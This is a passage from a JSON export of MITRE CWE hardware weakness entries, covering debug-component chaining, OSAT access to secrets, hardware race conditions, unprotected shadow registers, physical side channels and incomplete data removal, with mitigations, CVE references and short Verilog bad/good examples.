\u201cDefense-in-depth\u201d."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that a debug message does not reveal any unnecessary information during the debug process for the intended response."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example here shows how an attacker can take advantage of unnecessary information in debug messages.","Body_Text":["Example 1: Suppose in response to a Test Access Port (TAP) chaining request the debug message also reveals the current TAP hierarchy (the full topology) in addition to the success/failure message.","Example 2: In response to a password-filling request, the debug message, instead of a simple Granted/Denied response, prints an elaborate message, \u201cThe user-entered password does not match the actual password stored in <directory name>.\u201d","The result of the above examples is that the user is able to gather additional unauthorized information about the system from the debug messages.","The solution is to ensure that Debug messages do not reveal additional details."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-18326","Description":"modem debug messages include cryptographic keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18326"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1112"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}}},"1296":{"attr":{"@_ID":"1296","@_Name":"Incorrect Chaining or Granularity of Debug Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s debug components contain incorrect chaining or granularity of debug components.","Extended_Description":{"xhtml:p":["For debugging and troubleshooting a chip, several hardware design elements are often implemented, including:","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions."],"xhtml:ul":{"xhtml:li":["Various Test Access Ports (TAPs) allow boundary scan commands to be executed.","For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a \\"stimulus and response\\" mechanism.","Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that debug components are properly chained and their granularity is maintained at different authentication levels."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components.","Body_Text":["In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there.","As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18347","Description":"Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device\'s protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18347"},{"Reference":"CVE-2020-1791","Description":"There is an improper authorization vulnerability in several smartphones. The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114).","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1791"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1297":{"attr":{"@_ID":"1297","@_Name":"Unprotected Confidential Information on Device is Accessible by OSAT Vendors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.","Extended_Description":{"xhtml:p":["In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor.","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ul":{"xhtml:li":["\u2022\\tEnsure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an \u201cunlock device\u201d request comes, it only unlocks that specific part and not all the parts for that product line.","\u2022\\tEnsure that the product\u2019s non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT.","\u2022\\tArrange to secure all communication between an OSAT facility and the chipmaker."]}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT.","Body_Text":["Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation. An OSAT facility accidentally leaks the key.","Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker.","The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1113"}},{"attr":{"@_External_Reference_ID":"REF-1114"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1298":{"attr":{"@_ID":"1298","@_Name":"Hardware Logic Contains Race Conditions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A race condition in the hardware logic results in undermining security guarantees of the system.","Extended_Description":{"xhtml:p":"A race condition in logic circuits typically occurs when a logic gate gets inputs from signals that have traversed different paths while originating from the same source. Such inputs to the gate can change at slightly different times in response to a change in the source signal. This results in a timing error or a glitch (temporary or permanent) that causes the output to change to an unwanted state before settling back to the desired state. If such timing errors occur in access control logic or finite state machines that are implemented in security sensitive flows, an attacker might exploit them to circumvent existing protections."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Adopting design practices that encourage designers to recognize and eliminate race conditions, such as Karnaugh maps, could result in the decrease in occurrences of race conditions."},{"Phase":"Implementation","Description":"Logic redundancy can be implemented along security critical paths to prevent race conditions. To avoid metastability, it is a good practice in general to default to a secure state in which access is not given to untrusted agents."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below shows a 2x1 multiplexor using logic gates. Though the code shown below results in the minimum gate solution, it is disjoint and causes glitches.","Example_Code":[{"#text":"// 2x1 Multiplexor using logic-gatesmodule glitchEx();wire not_sel;wire and_out1, and_out2;assign not_sel = ~sel;assign and_out1 = not_sel & in0;assign and_out2 = sel & in1;// Buggy line of code:assign z = and_out1 | and_out2; // glitch in signal zendmodule","attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"input wire in0, in1, sel,output wire z","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"assign z <= and_out1 or and_out2 or (in0 and in1);","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":["The buggy line of code, commented above, results in signal \'z\' periodically changing to an unwanted state. Thus, any logic that references signal \'z\' may access it at a time when it is in this unwanted state. This line should be replaced with the line shown below in the Good Code Snippet which results in signal \'z\' remaining in a continuous, known, state. Reference for the above code, along with waveforms for simulation can be found in the references below.","This line of code removes the glitch in signal z."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1115"}},{"attr":{"@_External_Reference_ID":"REF-1116"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1299":{"attr":{"@_ID":"1299","@_Name":"Missing Protection Mechanism for Alternate Hardware Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of protections on alternate paths to access\\n control-protected assets (such as unprotected shadow registers\\n and other external facing unguarded interfaces) allows an\\n attacker to bypass existing protections to the asset that are\\n\\t\\tonly performed against the primary path.","Extended_Description":{"xhtml:p":["An asset inside a chip might have access-control\\n protections through one interface. However, if all paths to\\n the asset are not protected, an attacker might compromise\\n the asset through alternate paths. These alternate paths\\n could be through shadow or mirror registers inside the IP\\n core, or could be paths from other external-facing\\n interfaces to the IP core or SoC.","Consider an SoC with various interfaces such as UART,\\n SMBUS, PCIe, USB, etc. If access control is implemented for\\n SoC internal registers only over the PCIe interface, then\\n an attacker could still modify the SoC internal registers\\n through alternate paths by coming through interfaces such\\n as UART, SMBUS, USB, etc.","Alternatively, attackers might be able to bypass\\n existing protections by exploiting unprotected, shadow\\n registers. Shadow registers and mirror registers typically\\n refer to registers that can be accessed from multiple\\n addresses. Writing to or reading from the aliased/mirrored\\n address has the same effect as writing to the address of\\n the main register. They are typically implemented within an\\n IP core or SoC to temporarily hold certain data. These data\\n will later be updated to the main register, and both\\n registers will be in synch. If the shadow registers are not\\n access-protected, attackers could simply initiate\\n transactions to the shadow registers and compromise system\\n security."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Implementation","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Register SECURE_ME is located at address 0xF00. A\\n mirror of this register called COPY_OF_SECURE_ME is\\n at location 0x800F00. The register SECURE_ME is\\n protected from malicious agents and only allows\\n access to select, while COPY_OF_SECURE_ME is not.","Access control is implemented using an allowlist (as\\n indicated by acl_oh_allowlist). The identity of the\\n initiator of the transaction is indicated by the\\n one hot input, incoming_id. This is checked against\\n the acl_oh_allowlist (which contains a list of\\n initiators that are allowed to access the asset).","Though this example is shown in Verilog, it will\\n apply to VHDL as well."]},"Example_Code":[{"#text":"module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n);output [31:0] data_out;input [31:0] data_in, incoming_id, address;input clk, rst_n;wire write_auth, addr_auth;reg [31:0] data_out, acl_oh_allowlist, q;assign write_auth = | (incoming_id & acl_oh_allowlist) ? 1 : 0;always @*assign addr_auth = (address == 32\u2019hF00) ? 1: 0;always @ (posedge clk or negedge rst_n)endmodule","attr":{"@_Nature":"informative","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"#text":"acl_oh_allowlist <= 32\u2019h8312;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q <= 32\u2019h0;data_out <= 32\u2019h0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q <= (addr_auth & write_auth) ? data_in: q;data_out <= q;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}]}]},{"#text":"assign addr_auth = (address == 32\u2019hF00) ? 1: 0;","attr":{"@_Nature":"bad","@_Language":"Verilog"}},{"#text":"assign addr_auth = (address == 32\u2019hF00 || address == 32\u2019h800F00) ? 1: 0;","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":"The bugged line of code is repeated in the Bad\\n example above. Weakness arises from the fact that the\\n SECURE_ME register can be modified by writing to the\\n shadow register COPY_OF_SECURE_ME, the address of\\n COPY_OF_SECURE_ME should also be included in the check.\\n That buggy line of code should instead be replaced as\\n shown in the Good Code Snippet below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18293","Description":"When GPIO is protected by blocking access\\n to corresponding GPIO resource registers,\\n protection can be bypassed by writing to the\\n corresponding banked GPIO registers instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18293"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"}]}},"1300":{"attr":{"@_ID":"1300","@_Name":"Improper Protection of Physical Side Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain sufficient protection\\n\\tmechanisms to prevent physical side channels from exposing\\n\\tsensitive information due to patterns in physically observable\\n\\tphenomena such as variations in power consumption,\\n\\telectromagnetic emissions (EME), or acoustic emissions.","Extended_Description":{"xhtml:p":["An adversary could monitor and measure physical\\n\\t phenomena to detect patterns and make inferences, even if it\\n\\t is not possible to extract the information in the digital\\n\\t domain.","Physical side channels have been well-studied for\\n\\t decades in the context of breaking implementations of\\n\\t cryptographic algorithms or other attacks against security\\n\\t features. These side channels may be easily observed by an\\n\\t adversary with physical access to the device, or using a\\n\\t tool that is in close proximity. If the adversary can\\n\\t monitor hardware operation and correlate its data processing\\n\\t with power, EME, and acoustic measurements, the adversary\\n\\t might be able to recover of secret keys and data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a set of leakage detection tests such as the procedure outlined in the Test Vector Leakage Assessment (TVLA) test requirements for AES [REF-1230]. TVLA is the basis for the ISO standard 17825 [REF-1229]. A separate methodology is provided by [REF-1228]. Note that sole reliance on this method might not yield expected results [REF-1239] [REF-1240].","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Post-silicon, perform full side-channel attacks (penetration testing) covering as many known leakage models as possible against test code."},"Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Pre-silicon - while the aforementioned TVLA methods can be performed post-silicon, models of device power consumption or other physical emanations can be built from information present at various stages of the hardware design process before fabrication. TVLA or known side-channel attacks can be applied to these simulated traces and countermeasures applied before tape-out. Academic research in this field includes [REF-1231] [REF-1232] [REF-1233]."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device to increase the difficulty of obtaining measurements of the side-channel."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a device that checks a\\n\\t\\t passcode to unlock the screen.","Example_Code":[{"#text":"As each character of\\n\\t\\t the PIN number is entered, a correct character\\n\\t\\t exhibits one current pulse shape while an\\n\\t\\t incorrect character exhibits a different current\\n\\t\\t pulse shape.","attr":{"@_Nature":"bad"}},{"#text":"Rather than comparing\\n\\t\\t each character to the correct PIN value as it is\\n\\t\\t entered, the device could accumulate the PIN in a\\n\\t\\t register, and do the comparison all at once at the\\n\\t\\t end. Alternatively, the components for the\\n\\t\\t comparison could be modified so that the current\\n\\t\\t pulse shape is the same regardless of the\\n\\t\\t correctness of the entered\\n\\t\\t character.","attr":{"@_Nature":"good"}}],"Body_Text":"PIN numbers used to unlock a cell phone\\n\\t\\t should not exhibit any characteristics about\\n\\t\\t themselves. This creates a side channel. An\\n\\t\\t attacker could monitor the pulses using an\\n\\t\\t oscilloscope or other method. Once the first\\n\\t\\t character is correctly guessed (based on the\\n\\t\\t oscilloscope readings), they can then move to the\\n\\t\\t next character, which is much more efficient than\\n\\t\\t the brute force method of guessing every possible\\n\\t\\t sequence of characters."},{"Intro_Text":"Consider the device vulnerability CVE-2021-3011, which affects certain microcontrollers [REF-1221]. The Google Titan Security Key is used for two-factor authentication using cryptographic algorithms. The device uses an internal secret key for this purpose and exchanges information based on this key for the authentication. If this internal secret key and the encryption algorithm were known to an adversary, the key function could be duplicated, allowing the adversary to masquerade as the legitimate user.","Example_Code":[{"#text":"The local method of extracting the secret key consists of plugging the key into a USB port and using electromagnetic (EM) sniffing tools and computers.","attr":{"@_Nature":"bad"}},{"#text":"Several solutions could have been considered by the manufacturer. For example, the manufacturer could shield the circuitry in the key or add randomized delays, indirect calculations with random values involved, or randomly ordered calculations to make extraction much more difficult or a combination of these techniques.","attr":{"@_Nature":"good"}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"electromagnetic-wave side-channel in security-related microcontrollers allows extraction of private key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2013-4576","Description":"message encryption software uses certain instruction sequences that allows RSA key extraction using a chosen-ciphertext attack and acoustic cryptanalysis","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576"},{"Reference":"CVE-2020-28368","Description":"virtualization product allows recovery of AES keys from the guest OS using a side channel attack against a power/energy monitoring interface.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28368"},{"Reference":"CVE-2019-18673","Description":"power consumption varies based on number of pixels being illuminated in a display, allowing reading of secrets such as the PIN by using the USB interface to measure power consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18673"}]},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}},{"attr":{"@_External_Reference_ID":"REF-1218"}},{"attr":{"@_External_Reference_ID":"REF-1221"}},{"attr":{"@_External_Reference_ID":"REF-1228"}},{"attr":{"@_External_Reference_ID":"REF-1229"}},{"attr":{"@_External_Reference_ID":"REF-1230"}},{"attr":{"@_External_Reference_ID":"REF-1231","@_Section":"pp. 305-319"}},{"attr":{"@_External_Reference_ID":"REF-1232","@_Section":"pp. 123-130"}},{"attr":{"@_External_Reference_ID":"REF-1233"}},{"attr":{"@_External_Reference_ID":"REF-1234"}},{"attr":{"@_External_Reference_ID":"REF-1235"}},{"attr":{"@_External_Reference_ID":"REF-1239"}},{"attr":{"@_External_Reference_ID":"REF-1240"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods, observed examples, and references"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-13","Contribution_Comment":"Provided detection methods, observed examples, and references"}]}},"1301":{"attr":{"@_ID":"1301","@_Name":"Insufficient or Incomplete Data Removal within Hardware Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s data removal process does not completely delete all data and potentially sensitive information within hardware components.","Extended_Description":{"xhtml:p":["Physical properties of hardware devices, such as remanence of magnetic media, residual charge of ROMs/RAMs, or screen burn-in may still retain sensitive data after a data removal process has taken place and power is removed.","Recovering data after erasure or overwriting is possible due to a phenomenon called data remanence. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can 